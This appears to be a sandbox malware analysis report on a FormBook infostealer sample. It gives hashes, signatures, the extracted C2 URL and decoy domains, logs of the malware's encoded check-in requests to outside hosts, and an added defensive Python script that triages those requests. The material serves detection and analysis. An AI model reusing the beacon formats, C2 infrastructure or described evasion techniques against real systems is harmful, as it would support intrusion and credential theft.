Windows Analysis Report TT_SWIFT_Export Order_noref S10SMG00318021.exe

Overview

General Information

Sample Name: TT_SWIFT_Export Order_noref S10SMG00318021.exe
Analysis ID: 528704
MD5: fff91c58119d3cd7f68457e8565f7116
SHA1: 4201eb7214bd3658889739e4856412b8063e0405
SHA256: f8c0d385ece89cd926b2c74680c036f9927414955e7ff4ed12b576470b8c1745
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.liberia-infos.net/46uq/"], "decoy": ["beardeddentguy.com", "envirobombs.com", "mintbox.pro", "xiangpusun.com", "pyjama-france.com", "mendocinocountylive.com", "innovativepropsolutions.com", "hpsaddlerock.com", "qrmaindonesia.com", "liphelp.com", "archaeaenergy.info", "18446744073709551615.com", "littlecreekacresri.com", "elderlycareacademy.com", "drshivanieyecare.com", "ashibumi.com", "stevenalexandergolf.com", "adoratv.net", "visitnewrichmond.com", "fxbvanpool.com", "aarondecker.online", "environmentalkivul.com", "cardsncrepes.com", "hopdongdientu-viettel.com", "thebroughtguarantee.com", "howtofindahotniche.com", "1678600.win", "pityana.com", "akconsultoria.com", "markazkreasindo.com", "ronniecapitol.com", "tailsontour.com", "abros88.com", "laboratoriodentaltj.com", "fuckingmom86.xyz", "5pz59.com", "centralmadu.com", "ispecwar.com", "otetransportanddispatching.com", "cartaovirtual.net", "hsadmin.xyz", "xn--12c2bed4dxay5cxdh1s.online", "oki-net.com", "scenekidfancams.com", "preciousmugs.com", "754711.com", "helpigservices.com", "blueharepress.com", "xmshzs.com", "lovelycharlestonhomes.com", "wamhsh.com", "burlesquercize.com", "oppoexch.com", "ditjai.tech", "the-hausd-group.com", "loosebland.website", "syntheticloot.net", "gzfusco.com", "www-by.com", "farraztravel.com", "beheld3d.art", "douyababy.space", "elcuerpohumano.xyz", "3soap.com"]}
Multi AV Scanner detection for submitted file
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 Avira URL Cloud: Label: malware
Source: www.liberia-infos.net/46uq/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\AnsPejV.exe ReversingLabs: Detection: 35%
Antivirus or Machine Learning detection for unpacked file
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 4x nop then pop esi 8_2_0041584A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 4x nop then pop ebx 8_2_00406ABB
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop esi 20_2_006C584A
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop ebx 20_2_006B6ABB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.innovativepropsolutions.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Domain query: www.aarondecker.online
Source: C:\Windows\explorer.exe Domain query: www.754711.com
Source: C:\Windows\explorer.exe Domain query: www.pyjama-france.com
Source: C:\Windows\explorer.exe Domain query: www.wamhsh.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.hpsaddlerock.com
Source: C:\Windows\explorer.exe Domain query: www.blueharepress.com
Source: C:\Windows\explorer.exe Network Connect: 156.226.250.165 80
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.liberia-infos.net/46uq/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1
  Host: www.wamhsh.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1
  Host: www.pyjama-france.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1
  Host: www.hpsaddlerock.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1
  Host: www.aarondecker.online
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.227.38.74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 16:31:46 GMTServer: ApacheContent-Length: 260Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 61 6d 68 73 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.wamhsh.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 25 Nov 2021 16:31:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 183X-Sorting-Hat-ShopId: 51998097592X-Request-ID: dbaee5ab-3952-40fa-97f1-8e4299a03f3aX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6b3c4509ccd05b7a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 
72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 16:31:56 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://help.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://news.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://shop.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://shop.gandi.net/en/domain/suggest?search=elderlycareacademy.com&amp;source=parking
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://shop.gandi.net/en/domain/transfer
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=elderlycareacademy.com
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://www.gandi.net/en
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://www.gandi.net/en/cloud
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://www.gandi.net/en/security
Source: help.exe, 00000014.00000002.507665778.00000000035F2000.00000004.00020000.sdmp String found in binary or memory: https://www.gandi.net/en/simple-hosting
Source: unknown DNS traffic detected: queries for: www.innovativepropsolutions.com
Source: global traffic HTTP traffic detected: GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1
  Host: www.wamhsh.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1
  Host: www.pyjama-france.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1
  Host: www.hpsaddlerock.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic HTTP traffic detected: GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1
  Host: www.aarondecker.online
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
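Two pieces of this report belong together: the extracted configuration (one C2 entry, www.liberia-infos.net/46uq/, plus a long decoy list) and the user-agent-less GET requests captured on the wire. Every Host header in those requests (www.wamhsh.com, www.pyjama-france.com, www.hpsaddlerock.com, www.aarondecker.online) is on the decoy list and the configured C2 is never contacted in this run; FormBook interleaves requests to decoy domains with its real check-in, and the decoys are generally unrelated third-party sites (the 403/404 responses above come from Cloudflare, openresty and a parked Gandi page), so they are context for the analyst rather than block-list entries. The Python script below is an added triage example, not part of the Joe Sandbox report: it parses raw requests, keeps the base64-like query values verbatim, classifies each Host against the configuration and flags the check-in traits the report's signatures describe (GET to the C2 path, no User-Agent, a NUL-padded body). Assumptions: the decoy list is cut down to the entries needed here (the report lists 64), the CRLF framing of the requests is reconstructed because extraction fused the header lines, and BENIGN_REQUEST is a constructed control request that does not appear in the report.

```python
"""Added triage example (not from the Joe Sandbox report): join the extracted
FormBook configuration with captured HTTP requests to separate the configured
C2 from decoy traffic and flag the check-in traits."""
from urllib.parse import urlsplit

# Configuration as printed by the report's extractor; the decoy list is cut
# down to the entries used here (the report lists 64 decoy domains).
FORMBOOK_CONFIG = {
    "C2 list": ["www.liberia-infos.net/46uq/"],
    "decoy": ["hpsaddlerock.com", "pyjama-france.com", "aarondecker.online",
              "wamhsh.com", "innovativepropsolutions.com", "754711.com",
              "blueharepress.com", "elderlycareacademy.com"],
}

# The four GET requests from the report's network section. CRLF framing is an
# assumption (extraction fused the lines); the 7 NUL body bytes are the
# report's "Data Raw".
CAPTURED_REQUESTS = [
    ("GET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1\r\n"
     "Host: www.wamhsh.com\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00"),
    ("GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1\r\n"
     "Host: www.pyjama-france.com\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00"),
    ("GET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1\r\n"
     "Host: www.hpsaddlerock.com\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00"),
    ("GET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1\r\n"
     "Host: www.aarondecker.online\r\nConnection: close\r\n\r\n\x00\x00\x00\x00\x00\x00\x00"),
]

# Constructed control request (not from the report) to show a non-match.
BENIGN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, raw query pairs, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # Keep query values verbatim: the FormBook values are base64-like and
    # contain '+' and '/', which parse_qs would turn into spaces or decode.
    query = dict(kv.split("=", 1) if "=" in kv else (kv, "")
                 for kv in parts.query.split("&") if kv)
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "body": body.encode("latin-1")}


def normalise_host(host: str) -> str:
    """Lower-case, drop a port and a leading 'www.' so config entries and Host headers compare."""
    host = host.strip().lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def c2_paths(config: dict) -> dict:
    """Map configured C2 hosts to their URI path, e.g. {'liberia-infos.net': '/46uq/'}."""
    paths = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        paths[normalise_host(host)] = "/" + path
    return paths


def classify_host(host: str, config: dict) -> str:
    """'c2' for a configured C2 host, 'decoy' for a decoy-list host, else 'unknown'."""
    host = normalise_host(host)
    if host in c2_paths(config):
        return "c2"
    if host in {normalise_host(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def triage_request(raw: str, config: dict) -> dict:
    """Classify one request against the configuration and the check-in traits."""
    req = parse_request(raw)
    host = req["headers"].get("host", "")
    findings = []
    if "user-agent" not in req["headers"]:
        findings.append("no User-Agent header")
    if req["path"] in set(c2_paths(config).values()):
        findings.append("URI path matches configured C2 path " + req["path"])
    if req["method"] == "GET" and req["body"]:
        findings.append("GET carries a %d-byte body" % len(req["body"]))
    role = classify_host(host, config)
    # A configured C2 or decoy host is an indicator outright; an unknown host
    # is still worth a look when it shows every trait of the check-in.
    return {"host": normalise_host(host), "role": role, "findings": findings,
            "suspicious": role != "unknown" or len(findings) == 3}


def summarise(requests: list, config: dict) -> dict:
    """Count contacted hosts by role; for this run every captured request hit a decoy."""
    counts = {"c2": 0, "decoy": 0, "unknown": 0}
    for raw in requests:
        counts[triage_request(raw, config)["role"]] += 1
    return counts


if __name__ == "__main__":
    for raw in CAPTURED_REQUESTS + [BENIGN_REQUEST]:
        print(triage_request(raw, FORMBOOK_CONFIG))
    print(summarise(CAPTURED_REQUESTS + [BENIGN_REQUEST], FORMBOOK_CONFIG))
```

Running it shows four "decoy" hits with all three check-in traits, no contact with the configured C2, and the control request classified "unknown" with no findings. The query values are kept raw on purpose: the long parameter (3fQ0Khi) and the constant short one (j0=SFN8Rxuh3) are the data an analyst pivots on, and standard query decoding would corrupt the '+' characters inside them.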

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
